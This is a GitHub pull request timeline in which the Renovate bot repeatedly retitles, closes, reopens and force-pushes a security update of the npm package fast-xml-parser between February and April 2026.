@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] - autoclosed chore(deps): update dependency fast-xml-parser to v5 [security] Feb 18, 2026
@renovate renovate Bot reopened this Feb 18, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch 2 times, most recently from 9e0a960 to 635e4ef Compare February 18, 2026 03:24
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] chore(deps): update dependency fast-xml-parser to v5 [security] - autoclosed Feb 27, 2026
@renovate renovate Bot closed this Feb 27, 2026
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] - autoclosed chore(deps): update dependency fast-xml-parser to v5 [security] Feb 28, 2026
@renovate renovate Bot reopened this Feb 28, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch 2 times, most recently from 635e4ef to ae62fd1 Compare February 28, 2026 20:35
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] chore(deps): update dependency fast-xml-parser to v4.5.4 [security] Mar 2, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch from ae62fd1 to 4f76cb9 Compare March 2, 2026 17:51
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch from 4f76cb9 to 7d72f11 Compare March 18, 2026 00:41
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v4.5.4 [security] chore(deps): update dependency fast-xml-parser to v5 [security] Mar 18, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch from 7d72f11 to 59d176b Compare March 20, 2026 01:14
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] chore(deps): update dependency fast-xml-parser to v5 [security] - autoclosed Mar 27, 2026
@renovate renovate Bot closed this Mar 27, 2026
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] - autoclosed chore(deps): update dependency fast-xml-parser to v5 [security] Mar 30, 2026
@renovate renovate Bot reopened this Mar 30, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch 2 times, most recently from 59d176b to 371571d Compare March 30, 2026 17:40
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch from 371571d to 804f526 Compare April 8, 2026 17:26
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] chore(deps): update dependency fast-xml-parser to v4.5.5 [security] Apr 9, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch from 804f526 to d35bd27 Compare April 9, 2026 00:12
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch from d35bd27 to 2cb9f86 Compare April 23, 2026 05:28
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v4.5.5 [security] chore(deps): update dependency fast-xml-parser to v5 [security] Apr 23, 2026
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] chore(deps): update dependency fast-xml-parser to v5 [security] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] - autoclosed chore(deps): update dependency fast-xml-parser to v5 [security] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch 2 times, most recently from 2cb9f86 to ec720be Compare April 27, 2026 22:47
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants